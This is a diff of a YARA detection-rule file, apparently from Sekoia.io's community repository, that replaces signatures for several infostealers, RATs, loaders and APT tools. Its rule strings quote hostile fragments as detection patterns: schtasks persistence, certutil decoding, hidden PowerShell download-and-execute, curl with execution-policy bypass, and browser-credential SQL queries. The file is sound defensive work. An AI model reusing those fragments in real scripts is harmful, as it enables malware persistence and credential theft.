+		logic_hash = "49953c76796f671ed80afa21872aac500d706f2af4426a5ec2854e16b9d0e474"
 		score = 75
 		quality = 80
-		tags = ""
-		version = "1.1"
+		tags = "FILE"
+		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$fmtstr01 = "{\"v\":\"" ascii wide
-		$fmtstr02 = ",\"u\":\"" ascii wide
-		$fmtstr03 = ",\"a\":\"" ascii wide
-		$fmtstr04 = ",\"w\":\"" ascii wide
-		$fmtstr05 = ",\"d\":\"" ascii wide
-		$fmtstr06 = ",\"n\":\"" ascii wide
-		$fmtstr07 = ",\"r\":\"1\"" ascii wide
-		$fmtstr08 = ",\"r\":\"0\"" ascii wide
-		$fmtstr09 = ",\"xn\":\"" ascii wide
-		$fmtstr10 = ",\"s\":0}" ascii wide
-		$fmtstr11 = "{\"u\":\"" ascii wide
-		$fmtstr12 = "\",\"sc\":1" ascii wide
-		$fmtstr13 = ",\"dt\":\"" ascii wide
+		$s1 = "bat & schtasks /create" wide
+		$s2 = "/sc minute /mo 1" wide
+		$s3 = "c3RhcnQgL21pbiBwb3dlcnNoZWxsIC1jb21tYW5kICJJV1IgLVVzZUJhc2ljUGFyc2luZyAnaHR0cHM6" wide
+		$s4 = " & certutil -f -decode " wide
 
 	condition:
-		8 of ( $fmtstr* )
+		uint32( 0 ) == 0x0000004c and all of them
 }
-
-rule SEKOIA_Infostealer_Win_Mars_Stealer : FILE
+rule SEKOIA_Infostealer_Win_Blustealer : FILE
 {
 	meta:
-		description = "Detect Mars Stealer based on specific strings"
+		description = "Detect the BluStealer infostealer based on characteristic strings"
 		author = "Sekoia.io"
-		id = "3e2c7440b2fc9e4b039e6fa8152ac8fd"
-		date = "2022-02-03"
+		id = "a56b3c12-9d83-4a0b-81e8-43332e64d599"
+		date = "2022-10-05"
 		modified = "2024-12-19"
-		reference = "https://3xp0rt.com/posts/mars-stealer"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_mars_stealer.yar#L3-L44"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b2b36a280c3c6cbbb8cbb9f1dd3eb48a4943ebbddb48eba2ac3d0db03924cafd"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_blustealer.yar#L1-L29"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "fc7c11a9ddd21228aa773da6054220211327727a87d48008b7edb202c48666d8"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
-		modification_date = "2022-02-14"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$dec = {a3 ?? ?? ?? ?? 68 ?? ?? ?? ?? e8 ?? ?? 00 00 83 c4 ??}
-		$api00 = "LoadLibrary" ascii
-		$api01 = "GetProcAddress" ascii
-		$api02 = "ExitProcess" ascii
-		$api03 = "advapi32.dll" ascii
-		$api04 = "crypt32.dll" ascii
-		$api05 = "GetTickCount" ascii
-		$api06 = "Sleep" ascii
-		$api07 = "GetUserDefaultLangID" ascii
-		$api08 = "CreateMutex" ascii
-		$api09 = "GetLastError" ascii
-		$api10 = "HeapAlloc" ascii
-		$api11 = "GetProcessHeap" ascii
-		$api12 = "GetComputerName" ascii
-		$api13 = "VirtualProtect" ascii
-		$api14 = "GetUserName" ascii
-		$api15 = "CryptStringToBinary" ascii
-		$str0 = "JohnDoe" ascii
+		$cha01 = "@top\\LOGGERS\\DARKCLOUD" wide
+		$cha02 = "===============DARKCLOUD===============" wide
+		$cha03 = "#######################################DARKCLOUD#######################################" wide
+		$cha04 = "fireballsabadafirebricksfisherboat" ascii
+		$cha05 = "Moonchild Pro2ductions" wide
+		$str01 = "\\Microsoft\\Windows\\Templates\\credentials.txt" wide
+		$str02 = "\\NETGATE Technologies\\BlackHawK\\Profiles" wide
+		$str03 = "SysWOW64\\winsqlite3.dll" wide
+		$str04 = "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\*RD_" wide
+		$str05 = "Expiry Date;" wide
+		$str06 = "SELECT c0subject, c3author, c4recipients, c1body  FROM messagesText_content" wide
+		$str07 = "http://www.mediacollege.com/internet/utilities/show-ip.shtml" wide
+		$str08 = "\\163MailContacts.txt" wide
+		$key_0 = {ba ?? ?? 40 00 8d 4?}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( #dec > 400 and 12 of ( $api* ) and $str0 ) or for any i in ( 0 .. pe.number_of_sections -1 ) : ( pe.sections [ i ] . name == "LLCPPC" and pe.sections [ i ] . raw_data_size < 5000 )
+		uint16( 0 ) == 0x5A4D and 2 of ( $cha* ) and 4 of ( $str* ) and $key_0
 }
-
-rule SEKOIA_In2Al5D_P3In4Er_Loader : FILE
+rule SEKOIA_Infostealer_Win_Banditstealer : FILE
 {
 	meta:
-		description = "Invalid printer loader detection based on the XOR key"
+		description = "Finds BanditStealer samples based on specific strings"
 		author = "Sekoia.io"
-		id = "6dd3046d-55fb-4bcc-8735-dbc0add4d570"
-		date = "2023-04-24"
+		id = "d1e45a5c-c06d-4161-8d30-fa94bcf0ea7a"
+		date = "2023-07-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/in2al5d_p3in4er_loader.yar#L3-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "fb7dadcd1e87c15cacfc046e76648b1fa29f1bce44fa0314b84746ca57eebaed"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_banditstealer.yar#L1-L35"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "64d4860dd8a783be10541dd5c939dcd2a2b08309a7cd17b9dbbda1ba8b26485d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -233864,98 +234607,105 @@ rule SEKOIA_In2Al5D_P3In4Er_Loader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$xor_key = "in2al5d p3in4er" ascii fullword
+		$spe01 = "Banditstealer" ascii
+		$spe02 = "BANDIT STEALER" ascii
+		$spe03 = "Location: Geolocation: " ascii
+		$spe04 = "awesomeProject2/core.GetWallets" ascii
+		$spe05 = "awesomeProject2/core.GetCreditCards" ascii
+		$spe06 = "awesomeProject2/core.GetCookies" ascii
+		$spe07 = "awesomeProject2/core.KillProcessByName" ascii
+		$spe08 = "main.sendZipToTelegram" ascii
+		$str01 = "json:\"city\"" ascii
+		$str02 = "UAC disabled" ascii
+		$str03 = "\\OpenVPN Connect\\profiles\\" ascii
+		$str04 = "\\Documents\\Monero\\wallets\\" ascii
+		$str05 = "cookies.sqlite" ascii
+		$str06 = "creditcard.txt" ascii
+		$str07 = "vmware.exe" ascii
+		$str08 = "aeachknmefphepccionboohckonoeemg" ascii
+		$str09 = "\\Documents\\NetSarang\\Xftp\\Sessions\\" ascii
+		$str10 = "\\WhatsApp\\Local Storage\\leveldb\\" ascii
+		$str11 = "Visited Time: %s" ascii
+		$str12 = "\\Google\\Chrome\\User Data\\Telegram Desktop\\tdata\\" ascii
 
 	condition:
-		all of them and ( filesize > 4MB and filesize < 7MB ) and pe.is_pe
+		uint16( 0 ) == 0x5a4d and 2 of ( $spe* ) and 6 of ( $str* )
 }
-rule SEKOIA_Apt_Gamaredon_Htmlsmuggling_Attachment : FILE
+
+rule SEKOIA_Rat_Win_Nighthawk : FILE
 {
 	meta:
-		description = "Detects Gamaredon HTMLSmuggling attachment"
+		description = "Detects Nighthawk RAT"
 		author = "Sekoia.io"
-		id = "a39b6e67-9327-4c5b-902a-b9853cfefc8e"
-		date = "2023-01-20"
+		id = "91bc3c5b-83fd-47f8-9652-df0f6a70b693"
+		date = "2022-11-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_gamaredon_htmlsmuggling_attachment.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "e13da493404b27ef0c026ca32accbb30792981e810c099d633f5de225e241b4d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rat_win_nighthawk.yar#L3-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "9a0c72de5b097f74d3c44586b8355c410470992f37d9a09c5f6db36ad6286d70"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
+		hash1 = "0551ca07f05c2a8278229c1dc651a2b1273a39914857231b075733753cb2b988"
+		hash2 = "9a57919cc5c194e28acd62719487c563a8f0ef1205b65adbe535386e34e418b8"
+		hash3 = "38881b87826f184cc91559555a3456ecf00128e01986a9df36a72d60fb179ccf"
+		hash4 = "f3bba2bfd4ed48b5426e36eba3b7613973226983a784d24d7a20fcf9df0de74e"
+		hash5 = "b775a8f7629966592cc7727e2081924a7d7cf83edd7447aa60627a2b67d87c94"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "['at'+'ob'](" ascii
-		$ = "['ev'+'al'](" ascii
-		$ = "document.querySelectorAll('[" ascii
-		$ = "[0].innerHTML.split(' ').join('')))" ascii
+		$pattern1 = { 48 8d 0d ?? ?? ?? ?? 51 5a 48 81 c1 ?? ?? ?? ?? 48 81 c2 ?? ?? ?? ?? ff e2 }
+		$pattern2 = { 66 03 D2 66 33 D1 66 C1 E2 02 66 33 D1 66 23 D0 0F B7 C1 }
 
 	condition:
-		filesize < 1MB and 2 of them
+		uint16( 0 ) == 0x5A4D and filesize < 2MB and ( ( 1 of them ) or ( pe.section_index ( ".profile" ) and pe.section_index ( ".detourc" ) ) )
 }
-rule SEKOIA_Apt_Mustangpanda_Tonedrop : FILE
+rule SEKOIA_Ursnif : FILE
 {
 	meta:
-		description = "TONEDROP strings"
+		description = "Ursnif Payload"
 		author = "Sekoia.io"
-		id = "39df631c-5766-4804-838f-6c9b800c0cc9"
-		date = "2023-06-19"
+		id = "ac392af3-c344-453c-9427-5bb46223e01c"
+		date = "2024-12-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_mustangpanda_tonedrop.yar#L1-L43"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "97f9138810fbc56fa1cab671865b3234f63fcd0f9a15ba012dfe76e86c6dbd48"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/ursnif.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "fd3c3be5ede0a980b44560cfb9b8c4c1ee322091fa86bc9143f30dc900053c2b"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$window1 = "PROCMON_WINDOW_CLASS" ascii wide
-		$window2 = "OLLYDBG" ascii wide
-		$window3 = "WinDbgFrameClass" ascii wide
-		$window4 = "OllyDbg - [CPU]" ascii wide
-		$window5 = "Immunity Debugger - [CPU]" ascii wide
-		$errormsg1 = "Unable to open file %s for writing" ascii wide
-		$proc_01 = "cheatengine-x86_64.exe" ascii wide
-		$proc_02 = "ollydbg.exe" ascii wide
-		$proc_03 = "ida.exe" ascii wide
-		$proc_04 = "ida64.exe" ascii wide
-		$proc_05 = "radare2.exe" ascii wide
-		$proc_06 = "x64dbg.exe" ascii wide
-		$proc_07 = "procmon.exe" ascii wide
-		$proc_08 = "procmon64.exe" ascii wide
-		$proc_09 = "procexp.exe" ascii wide
-		$proc_10 = "processhacker.exe" ascii wide
-		$proc_11 = "pestudio.exe" ascii wide
-		$proc_12 = "systracerx32.exe" ascii wide
-		$proc_13 = "fiddler.exe" ascii wide
-		$proc_14 = "tcpview.exe" ascii wide
-		$opcodes_check_PEsize = {C7 85 94 FD FF FF 2C 02}
-		$opcodes_ShellExecute_1 = {C7 45 BC 53 68 65 6C}
-		$opcodes_ShellExecute_2 = {C7 45 C0 6C 45 78 65}
-		$opcodes_ShellExecute_3 = {C7 45 C4 63 75 74 65}
-		$opcodes_ShellExecute_4 = {66 C7 45 C8 41 00}
+		$crypto64_1 = {41 8B 02 ?? C1 [0-1] 41 33 C3 45 8B 1A 41 33 C0 D3 C8 41 89 02 49 83 C2 04 83 C2 FF 75 D?}
+		$crypto64_2 = {44 01 44 24 10 FF C1 41 8B C0 D1 64 24 10 33 C3 41 8B D8 FF 4C 24 10 41 33 C3 01 44 24 10 D3 C8 01 44 24 10 41 89 02 49 83 C2 04 83 C2 FF 75 C3}
+		$crypto64_3 = {33 C6 ?? C7 [0-1] 49 83 C2 04 33 C3 8B F1 8B CF D3 C8 89 02 48 83 C2 04 41 83 C3 FF 75 ?? 45 85 C9 75 ?? 41 83 E0 03}
+		$crypto64_4 = {41 8B 02 41 8B CB 41 83 F3 01 33 C3 41 8B 1A C1 E1 03 41 33 C0 D3 C8 41 89 02 49 83 C2 04 83 C2 FF 75 C6}
+		$decrypt_config64 = {44 8B D9 33 C0 45 33 C9 44 33 1D ?? ?? ?? 00 ?? ?? D2 ?? ?? D2 74 ?? 4C 8D 42 10 45 3B 0A 73 2? 45 39 58 F8 75 1C 41 F6 40 FC 01 74 12}
+		$crypto32_1 = {01 45 FC D1 65 FC FF 4D FC 33 C1 33 45 0C 01 45 FC 43 8A CB D3 C8 8B CE 01 45 FC 89 02 83 C2 04 FF 4D 08 75 CD}
+		$crypto32_2 = {33 C1 33 44 24 10 43 8A CB D3 C8 8B CE 89 02 83 C2 04 FF 4C 24 0C 75 D9}
+		$decrypt_config32 = {8B ?? 08 5? 33 F? 3B [1-2] 74 14 A1 0? ?? ?? ?? 35 ?? ?? ?? ?? 50 8B D? E8 ?? D? 00 00 EB 02 33 C0 ?B ?? ?? ?? ?? ?? ?? ?? 74 14 8D 4D ?? ?? ?? 50 FF D? 85 C0 74 08}
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 8MB and 3 of ( $window* ) and $errormsg1 and 10 of ( $proc_* ) and 3 of ( $opcodes* )
+		true and uint16( 0 ) == 0x5A4D and ( ( $decrypt_config64 and any of ( $crypto64* ) ) or ( $decrypt_config32 and any of ( $crypto32* ) ) )
 }
-rule SEKOIA_Infostealer_Win_Doenerium_Str : FILE
+rule SEKOIA_Apt_Gamaredon_Lnk_Spreader : FILE
 {
 	meta:
-		description = "Detect the Doenerium infostealer based on specific strings"
+		description = "Detects LNK generated by Gamaredon LNK spreader"
 		author = "Sekoia.io"
-		id = "1645a86f-1063-4e98-a1fa-85fc8c4e9691"
-		date = "2022-09-29"
+		id = "2866ca1d-c094-49ba-b1de-ff9a60680e28"
+		date = "2023-06-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_doenerium_str.yar#L1-L29"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "9bc28d89ad2654c33f2ecd9736f5fb3a10dfc68dfef44ece6e628f5bb8db0800"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_gamaredon_lnk_spreader.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "7d6264ce74e298c6d58803f9ebdb4a40b4ce909d02fd62f54a1f8d682d73519a"
+		logic_hash = "e8a82fd4cdce7bc888184ccf8d182ab5bb53e30de04b02b7c63379bae5d21b1f"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -233963,196 +234713,188 @@ rule SEKOIA_Infostealer_Win_Doenerium_Str : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "doenerium" ascii
-		$str02 = "<================[   User Info   ]>================>" ascii
-		$str03 = "<================[WiFi connections]>================>" ascii
-		$str04 = "<================[Executable Info]>================>" ascii
-		$str05 = "<================[ Network Data ]>================>" ascii
-		$str06 = "\\Network Data.txt" ascii
-		$str07 = "\\Update.exe\" --processStart" ascii
-		$str09 = "\\WiFi Connections.txt" ascii
-		$str10 = "\\User Info.txt" ascii
-		$str11 = "\\Executable Info.txt" ascii
-		$str12 = "\\Found Wallets.txt" ascii
-		$str13 = "SELECT origin_url, username_value, password_value FROM logins" ascii
-		$str14 = "https://cdn.discordapp.com/embed/avatars/0.png" ascii
-		$str15 = "detectClipboard" ascii
-		$str16 = ".gofile.io/uploadFile" ascii
+		$ = "windoWSTYLE hiDdEn -NOlOgo iEX" wide nocase
+		$ = "(IeX (geT-coNtEnT" wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 6 of them
+		uint32be( 0 ) == 0x4C000000 and filesize < 3KB and all of them
 }
-rule SEKOIA_Crypter_Vbs_To_Exe
+rule SEKOIA_Infostealer_Win_Whitesnake_Loader_Feb23 : FILE
 {
 	meta:
-		description = "first stage of Crypter-VBS-to-EXE dropped on infected hosted"
+		description = "Finds WhiteSnake samples (loader module, bat file)"
 		author = "Sekoia.io"
-		id = "33ed286f-3055-452e-952b-abaf11a543a1"
-		date = "2023-01-03"
+		id = "f81a8a96-6fd2-4f5c-8a56-ff66ff1a80d3"
+		date = "2023-03-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/crypter_vbs_to_exe.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "4b3a411de3f36a7f9a310e1b789988c3d9d53eb195d04b374bdf1e5b4157b1e9"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_whitesnake_loader_feb23.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "c9d4414fb17c28a3ea2e75837732e1657bdc7b2df4a7ab34e458d659441759e8"
 		score = 75
-		quality = 55
-		tags = ""
+		quality = 80
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$theDot = ":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" ascii
-		$s1 = "cmd.exe /c curl" ascii
-		$s2 = "WScript.Sleep(3000)" ascii
-		$s3 = "runCmd = \"cmd.exe /c powershell.exe -exec Bypass -C \" + myVar +" ascii
-		$s4 = "WshShell.Run \"cmd /c \" & runCmd, 0, True" ascii
+		$str01 = "echo         Please wait... a while Loading data ...." ascii
+		$str02 = "CERTUTIL -f -decode" ascii
+		$str03 = "%Temp%\\build.exe" ascii
+		$crt = "-----BEGIN CERTIFICATE-----" ascii
+		$mz = "TVqQAAMAAAAEAAAA" ascii
 
 	condition:
-		#theDot> 200 and all of ( $s* )
+		($str01 in ( 0 .. 200 ) or $str02 in ( 0 .. 200 ) or $str03 in ( 0 .. 200 ) ) and $mz in ( @crt .. @crt + 50 ) and filesize < 100KB
 }
-rule SEKOIA_Manjusaka_Samples : FILE
+rule SEKOIA_Apt_Cloudmensis_Downloader_Strings : FILE
 {
 	meta:
-		description = "Detects Manjusaka via protobuf struture names (Windows / Linux / implants / C2)"
+		description = "Detects CloudMensis downloader"
 		author = "Sekoia.io"
-		id = "7aa8edb3-2e67-4632-af68-5b65c9aefe39"
-		date = "2022-08-04"
+		id = "450cfa42-7b56-4d93-afe2-9cf5c1049217"
+		date = "2022-07-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/manjusaka_samples.yar#L1-L41"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "58dcc406c87a8ec66c0904c4cf518cb38bca1aa9058196ce5d496f6269258200"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_cloudmensis_downloader_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "9532530f9b6c39d64611354f5d3c95e7c8b9ebf917ab797c162c3b51945db1fc"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = ".protos.AgentStatusR" ascii wide
-		$ = ".protos.AgentsR" ascii wide
-		$ = ".protos.FileActionR" ascii wide
-		$ = ".protos.FileEntryR" ascii wide
-		$ = ".protos.HttpFileActionR" ascii wide
-		$ = ".protos.HttpFileEntryR" ascii wide
-		$ = ".protos.PassResultR" ascii wide
-		$ = ".protos.PortResultR" ascii wide
-		$ = ".protos.PortResultR" ascii wide
-		$ = ".protos.PortResultR" ascii wide
-		$ = ".protos.ConfigH" ascii wide
-		$ = ".protos.AgentUpdateH" ascii wide
-		$ = ".protos.PluginExecH" ascii wide
-		$ = ".protos.PluginLoadH" ascii wide
-		$ = ".protos.ReqCwdH" ascii wide
-		$ = ".protos.ReqCmdH" ascii wide
-		$ = ".protos.ReqListFileH" ascii wide
-		$ = ".protos.ReqCatFileH" ascii wide
-		$ = ".protos.ReqNetStatH" ascii wide
-		$ = ".protos.ReqTaskListH" ascii wide
-		$ = ".protos.ReqScreenH" ascii wide
-		$ = ".protos.FileEventH" ascii wide
-		$ = ".protos.HttpFileEventH" ascii wide
-		$ = ".protos.PassGetEventH" ascii wide
-		$ = ".protos.FileGetEventH" ascii wide
-		$ = ".protos.AgentEventR" ascii wide
+		$ = "https://api.pcloud.com/getfilelink?path=%@&forcedownload=1"
+		$ = "python -c 'import os; print(os.confstr(65538))'"
+		$ = "getCmdResult:"
+		$ = "[pCloud DownloadFile:]"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and 15 of them
+		uint32be( 0 ) == 0xcafebabe and filesize < 1MB and all of them
 }
-rule SEKOIA_Implant_Any_Sliver : FILE
+rule SEKOIA_Apt_Boldmove_Strings : FILE
 {
 	meta:
-		description = "Rule which detects any Sliver implant PE/Dlls/ELFs/MAC-O."
+		description = "Detects BOLDMOVE via strings"
 		author = "Sekoia.io"
-		id = "4b16f28a-2048-4044-8620-8e7a1651f2b1"
-		date = "2021-11-08"
+		id = "0458e282-f92f-4600-964a-de6b66b4a82d"
+		date = "2023-01-16"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/implant_any_sliver.yar#L1-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "c7a2790fd13de0476cfe16ef26b2d4c8775f4f453d076c78975e2c372f03322c"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_boldmove_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "71649451b88629da1779c0856b2f1f60f87501962c69556f7943b049688a2d96"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		version = "1.1"
+		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = ").GetActiveC2" ascii
-		$s2 = ").GetVersion" ascii
-		$s3 = ").GetReconnectInterval" ascii
-		$s4 = ").GetProxyURL" ascii
-		$s5 = ").GetPollInterval" ascii
+		$s1 = "cwd=%s" ascii wide
+		$s2 = "executable=%s" ascii wide
+		$s3 = "curl/6.12.34" ascii wide
+		$s4 = "www.example.com" ascii wide
+		$s5 = "GET /ws HTTP/1.1" ascii wide
 
 	condition:
-		( uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0x7f454c46 or uint32be( 0 ) == 0xcffaedfe ) and ( true and filesize < 11MB and filesize > 7MB ) and ( all of ( $s* ) )
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 4MB and 4 of them
 }
-
-rule SEKOIA_Reverseshell_Win_1St_Troy : FILE
+rule SEKOIA_Apt_Cloudatlas_Stagescalldllmainafterexec
 {
 	meta:
-		description = "Detect the 1st Troy Reverse Shell agent used by Andariel"
+		description = "Detects call to dllmain after execution of exported function"
 		author = "Sekoia.io"
-		id = "b40b742d-8b1e-4d99-8df5-6cb8c9a7d8bd"
-		date = "2023-09-04"
+		id = "a24b7887-87f6-44e3-80c5-cd117e694595"
+		date = "2023-10-31"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/reverseshell_win_1st_troy.yar#L4-L32"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a85a6ef0fe3b3fde3cb833579f4fd69cd159737888ae41e69e40a6bdc1172d1f"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_cloudatlas_stagescalldllmainafterexec.yar#L1-L46"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "6d1c1717b4012e72b0069068158265dfd215cd7685a5489aba3de4a9024bfa28"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "186a6663eb91999b3e2637898ab40034f5fcd451150c9199d9b49328e64f90b5"
-		hash2 = "5b015e69629de37507e96ce258c27479d157714121d7c622698c6d1d6b547425"
 
 	strings:
-		$s1 = "1th Troy/02___Go/Reverse_Base64_Pipe"
+		$chunk_1 = {
+        55
+        8B EC
+        83 EC 10
+        C7 45 ?? 00 00 00 00
+        83 7D ?? 00
+        74 ??
+        8B 45 ??
+        89 45 ??
+        8B 4D ??
+        8B 51 ??
+        03 55 ??
+        89 55 ??
+        8B 45 ??
+        8B 48 ??
+        03 4D ??
+        89 4D ??
+        6A 00
+        6A 00
+        FF 75 ??
+        FF 55 ??
+        68 00 80 00 00
+        6A 00
+        8B 55 ??
+        52
+        FF 15 ?? ?? ?? ??
+        C7 45 ?? 01 00 00 00
+        8B 45 ??
+        8B E5
+        5D
+        C2 04 00
+        }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "657d7495796c36297ec1c13aaedf1dd3" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "debd992f27402355766cf3b5b47abe94" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "687d2535086bd055af5716760a2d87ce" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "78389349844e8d2d719603fc389779bf" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "44563b597e806af8a9ebe026c9ea6a53" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "5db8685a067d106fe66292b828a2161c" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "1268012f292e60785825726967a4e63e" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "c7b760c8b603f39a5ff9867accbad427" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "d28526f9543ecf429de4a863b8901575" )
+		any of them
 }
-rule SEKOIA_Apt_Kimsuky_Sharpext_Devps1_Strings : FILE
